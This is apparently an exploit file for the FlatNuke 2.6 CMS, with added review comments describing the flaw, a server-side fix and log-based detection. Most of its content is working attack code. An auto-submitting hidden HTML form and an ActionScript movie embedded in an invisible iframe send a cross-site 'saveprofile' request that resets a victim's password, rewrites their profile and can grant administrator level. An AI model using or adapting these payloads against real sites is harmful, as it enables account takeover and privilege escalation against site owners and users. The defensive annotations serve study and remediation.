/* hackflatnuke.txt
 *
 * Tested on FlatNuke version 2.6 (can work on 3, but it has to be modified)
 *
 * With this trick you can steal/modify a FlatNuke account by changing the
 * password and the whole profile, or change your own profile and become an admin
 *
 * Requirements:
 *   - You have to know the nickname of the account you want to steal or change
 *
 * NOTE(review): the requests below carry the target nickname ("user"), the
 * new password ("regpass") and the privilege level ("level") as ordinary POST
 * fields of the "saveprofile" action. Since knowing the nickname is the only
 * stated requirement, the handler presumably neither ties "user" to the
 * logged-in session nor asks for the current password, and takes "level"
 * from the client; confirm against the profile-saving code of the installed
 * version.
 * Server-side fix to look for: derive the account from the authenticated
 * session, require the current password for a password change, ignore
 * "level" unless the caller is already an administrator, and require a
 * per-session anti-CSRF token on the profile form.
 * For detection, review request logs for POSTs to index.php?mod=none_Login
 * with action=saveprofile whose "user" differs from the session's account,
 * that include a "level" field, or that arrive with an off-site Referer,
 * and audit the user store for unexpected level-10 accounts.
 */
HTML version modifiable
<!-- flatnuke.html-->
<html>
<body>
<title>Hack FlatNuke</title>
<!-- Every field is hidden and the action is a fixed URL on the FlatNuke site,
     so the POST is issued cross-site by the browser of whoever opens this page.
     Nothing in the form identifies the sender; the account is named only by
     the "user" field. -->
<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login">
<input type="hidden" name="action" value="saveprofile">
<!-- "user" selects the account to overwrite and "regpass" is its new password;
     no field carries the current password. -->
<input type="hidden" name="user" value="VICTIM">
<input type="hidden" name="regpass" value="NEW_PASS">
<input type="hidden" name="anag" value="NAME">
<input type="hidden" name="homep" value="VICTIM_SITE">
<input type="hidden" name="prof" value="PROFESSION">
<input type="hidden" name="prov" value="ORIGIN">
<input type="hidden" name="ava" value="blank.png">
<input type="hidden" name="url_avatar" value="">
<input type="hidden" name="firma" value="VICTIM">
<!-- "level" is the privilege field (10 = administrator per the author's note in
     the value); a server that trusts it lets the requester pick the role. -->
<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 
10=administrator">
</form>
<script>
// submit() is invoked immediately while this script is parsed; onload only
// receives its return value. The request therefore leaves without any click.
document.body.onload = document.forms[0].submit();
</script>
</body>
</html>
<!-- Byez -->
Flash versione that you have to export in a swf and import in a iframe
exploit.swf
// Same field names as the HTML form above; the placeholder values are in
// Italian and stand for the target nickname, new password, profile data and level.
var action:String = "saveprofile";
var user:String = "nome_user_che_modifichiamo";
var regpass:String = "nuova_pass";
var anag:String = "nome";
var homep:String = "sito_utente";
var prof:String = "professione";
var prov:String = "provenienza";
var ava:String = "blank.png";
var url_avatar:String = "";
var firma:String = "firma_utente";
var level:String = "livello da 1 a 10 N.B 10=amministartore";
// getURL with a method argument sends the variables declared above as the
// request body (ActionScript 1/2 behaviour), i.e. the same saveprofile POST.
getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST");
hackflatnuke.html
<html>
<head>
<title>Title</title>
</head>
<body bgcolor="000000">
<center>
<font face="Verdana" size="5" color="#FF0000"> Hack FlatNuke </font>
<br/>
<br/>
<!-- The iframe is borderless with zero height and width, so the embedded
     movie is not visible on the rendered page. -->
<iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
</center>
</body>
</html>